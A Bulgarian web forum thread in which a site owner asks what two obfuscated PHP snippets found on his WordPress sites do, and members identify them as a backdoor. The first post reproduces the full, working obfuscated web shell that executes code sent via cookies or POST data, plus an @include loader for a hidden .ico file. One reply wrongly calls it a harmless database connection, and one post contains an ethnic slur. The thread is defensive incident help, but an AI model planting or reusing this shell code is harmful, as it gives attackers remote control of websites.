Какви са тези скриптове? [Потенциално зловредни]

Spyrax

Member
Здравейте, някой може ли да ми обясни какво всъщност правят следните скриптове.

1-
<?php
$crhmep = 'i_4op\'91fm*lsbHdn2#k58extvuy3cr6a-g7';$locmm = Array();$locmm[] = $crhmep[29].$crhmep[30].$crhmep[22].$crhmep[32].$crhmep[24].$crhmep[22].$crhmep[1].$crhmep[8].$crhmep[26].$crhmep[16].$crhmep[29].$crhmep[24].$crhmep[0].$crhmep[3].$crhmep[16];$locmm[] = $crhmep[14].$crhmep[10];$locmm[] = $crhmep[18];$locmm[] = $crhmep[13].$crhmep[6].$crhmep[17].$crhmep[2].$crhmep[20].$crhmep[28].$crhmep[15].$crhmep[35].$crhmep[33].$crhmep[17].$crhmep[28].$crhmep[31].$crhmep[2].$crhmep[33].$crhmep[2].$crhmep[35].$crhmep[8].$crhmep[21].$crhmep[33].$crhmep[6].$crhmep[2].$crhmep[7].$crhmep[29].$crhmep[33].$crhmep[21].$crhmep[8].$crhmep[20].$crhmep[15].$crhmep[17].$crhmep[21].$crhmep[22].$crhmep[17].$crhmep[28].$crhmep[29].$crhmep[6].$crhmep[7];$locmm[] = $crhmep[29].$crhmep[3].$crhmep[26].$crhmep[16].$crhmep[24];$locmm[] = $crhmep[12].$crhmep[24].$crhmep[30].$crhmep[1].$crhmep[30].$crhmep[22].$crhmep[4].$crhmep[22].$crhmep[32].$crhmep[24];$locmm[] = $crhmep[22].$crhmep[23].$crhmep[4].$crhmep[11].$crhmep[3].$crhmep[15].$crhmep[22];$locmm[] = $crhmep[12].$crhmep[26].$crhmep[13].$crhmep[12].$crhmep[24].$crhmep[30];$locmm[] = $crhmep[32].$crhmep[30].$crhmep[30].$crhmep[32].$crhmep[27].$crhmep[1].$crhmep[9].$crhmep[22].$crhmep[30].$crhmep[34].$crhmep[22];$locmm[] = $crhmep[12].$crhmep[24].$crhmep[30].$crhmep[11].$crhmep[22].$crhmep[16];$locmm[] = $crhmep[4].$crhmep[32].$crhmep[29].$crhmep[19];foreach ($locmm[8]($_COOKIE, $_POST) as $xrdsmi => $tafqx){function vntijf($locmm, $xrdsmi, $uizcuck){return $locmm[7]($locmm[5]($xrdsmi . $locmm[3], ($uizcuck / $locmm[9]($xrdsmi)) + 1), 0, $uizcuck);}function araegf($locmm, $zzagizp){return @$locmm[10]($locmm[1], $zzagizp);}function pyjdjz($locmm, $zzagizp){$rxmwm = $locmm[4]($zzagizp) % 3;if (!$rxmwm) {$uugsexn = $locmm[0]; $vokdfgp = $uugsexn("", $zzagizp[1]($zzagizp[2]));$vokdfgp();exit();}}$tafqx = araegf($locmm, $tafqx);pyjdjz($locmm, $locmm[6]($locmm[2], $tafqx ^ vntijf($locmm, $xrdsmi, $locmm[9]($tafqx))));}


2- @include "\057hom\145/cl\141ssv\145g/c\154ien\164s/e\143otr\151keb\147.co\155/wp\055con\164ent\057the\155es/\164wen\164ysi\170tee\156/.5\14690d\06242.\151co"; (Това мяса на криптиран код)
 

Sky

Well-Known Member
Няма страшно, това е за връзка с базата данни. Криптирано е да не може се хакне.
 
Код:
"\057hom\145/cl\141ssv\145g/c\154ien\164s/e\143otr\151keb\147.co\155/wp\055con\164ent\057the\155es/\164wen\164ysi\170tee\156/.5\14690d\06242.\151co";
- /home/classveg/clients/SAITA TI/wp-content/themes/twentysixteen/.5f90d242.ico
 

AseasRoa

Well-Known Member
Поразхубавих малко кода и рецептата е горе-долу такава - взимат се $_COOKIE и $_POST, замесват се, разбъркват се, от тях евентуално излиза някаква функция, които се задейства и скрипта се прекратява. Зловредно е това, махай го.
 

Spyrax

Member
Поразхубавих малко кода и рецептата е горе-долу такава - взимат се $_COOKIE и $_POST, замесват се, разбъркват се, от тях евентуално излиза някаква функция, които се задейства и скрипта се прекратява. Зловредно е това, махай го.
Мда, това направих, беше лепнат на около 50 места, изчистих го, в момента върви сканиране за зловреден софтуер отново.

Странното е как е бил вкаран. Системата е под Wordpress, но беше версия 4.9 или 5.0.2 нещо такова, явно ще трябва да обновя на 5.3 заедно с всички разширения и тези които не ги използвам да ги изтрия.

На мнение съм, че е бил importn-ат в следствие на някакъв екслпойт на някое разширение или на самата тема за Wordpress. Благодаря за помощта, ако имате някакви съвети казвайте. :)
 

Spyrax

Member
Мисля, че е просто обикновен/опростен shell, който стартира команда през cookies и POST заявки.

foreach ($locmm[8]($_COOKIE, $_POST) as $xrdsmi => $tafqx)

Някакви допълнителни мнения? Без тролл моля.
 

AseasRoa

Well-Known Member
Ако принтнеш съдържанието на $locmm, то е такова:

Array (
[0] => create_function
[1] => H*
[2] => #
[3] => b92453d7-2364-47f8-941c-8f5d28e23c91
[4] => count
[5] => str_repeat
[6] => explode
[7] => substr
[8] => array_merge
[9] => strlen
[10] => pack
)

Повечето са имена на PHP функции. Обърни внимание на първата - create_function. За какво служи create_function... за създаване на функция в PHP... а функциите са за това за да се стартират.

Кода нищо не прави докато сайта се отваря нормално. Но който знае какви бисквитки или POST информация да постне, той реално може да изпълнява каквито си иска функции на твоя сайт.
 

Spyrax

Member
Ако принтнеш съдържанието на $locmm, то е такова:

Array (
[0] => create_function
[1] => H*
[2] => #
[3] => b92453d7-2364-47f8-941c-8f5d28e23c91
[4] => count
[5] => str_repeat
[6] => explode
[7] => substr
[8] => array_merge
[9] => strlen
[10] => pack
)

Повечето са имена на PHP функции. Обърни внимание на първата - create_function. За какво служи create_function... за създаване на функция в PHP... а функциите са за това за да се стартират.

Кода нищо не прави докато сайта се отваря нормално. Но който знае какви бисквитки или POST информация да постне, той реално може да изпълнява каквито си иска функции на твоя сайт.
Благодаря Ви за подробния отговор. Какво мнение имате относно как е станало и как да се предотврати пак, освен, че се препоръчва да се ъпдейтне до последна версия Wordpress и плъгините и всичко излишно да се изтрие.

Какъв съвет бихте дали, аз си мислих в php.ini да спра няколко функции като exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source
но сигурно ще повлиае на сайтовете.
 

ReminD

Well-Known Member
Мисля, че е просто обикновен/опростен shell, който стартира команда през cookies и POST заявки.

foreach ($locmm[8]($_COOKIE, $_POST) as $xrdsmi => $tafqx)

Някакви допълнителни мнения? Без тролл моля.
Ти ли мислиш или някой вместо теб?

its just a simple shell that executes commands through cookies and POST requests

Провери си плъгините
 

Spyrax

Member
Ти ли мислиш или някой вместо теб?




Провери си плъгините
Не съм твърдял, че аз съм дал предположението, просто от всичките предположения, мисля, че това е най-логично според ситуацията. Мерси за отговора, можеш ли да ми дадеш по детайлен съвет, защото са няколко сайта и не може да се локализира от кой е екслпойтнат.
 

Spyrax

Member
https://tools.kali.org/web-applications/wpscan сканирай ги и може да добиеш евентуална представа. Ежедневно добавят в DB-то експлоити, така че вероятно ще разбереш от кой плъгин/ тема става въпрос.
Мерси, ще го погледна. Нещо по-дробро за сканиране и по-бързо има ли?
 

ReminD

Well-Known Member
По-добро от това няма, ако имаше щеше да е то build-нато в Kali. Логовете също биха дали инфо, сайта ти е ударен от някакъв crawler, ако беше ръчно и персонално, да си разбрал по кофти начин. И забрани exec както са ти казали, кроновете, евентуално ще ти счупят нещо - разгледай тук : https://stackoverflow.com/questions/1865020/php-how-to-disable-dangerous-functions и мини на php 7+ . Една от причините, поради която мразя WP е, че заради някой индийски дебил и идиот, ти удрят сайта, че и не знаеш точно откъде, защото самата екосистема на WP те кара да инсталираш плъгини на килограм, дето са писани от идиоти.
 

Spyrax

Member
По-добро от това няма, ако имаше щеше да е то build-нато в Kali. Логовете също биха дали инфо, сайта ти е ударен от някакъв crawler, ако беше ръчно и персонално, да си разбрал по кофти начин. И забрани exec както са ти казали, кроновете, евентуално ще ти счупят нещо - разгледай тук : https://stackoverflow.com/questions/1865020/php-how-to-disable-dangerous-functions и мини на php 7+ . Една от причините, поради която мразя WP е, че заради някой индийски дебил и идиот, ти удрят сайта, че и не знаеш точно откъде, защото самата екосистема на WP те кара да инсталираш плъгини на килограм, дето са писани от идиоти.
Добре, супер мерси пак. Писах ти ЛС за по-лесна комуникация.

Ако някой друг също иска да изрази мнение, нека да пише в темата.
 

Sky

Well-Known Member
Ставаш малко нагъл вече.
Ако искаш секюрити одит се плаща и то не малко
 

John Galt

Well-Known Member
Ставаш малко нагъл вече.
Ако искаш секюрити одит се плаща и то не малко
Има пари, ще плати ;)
 

Горе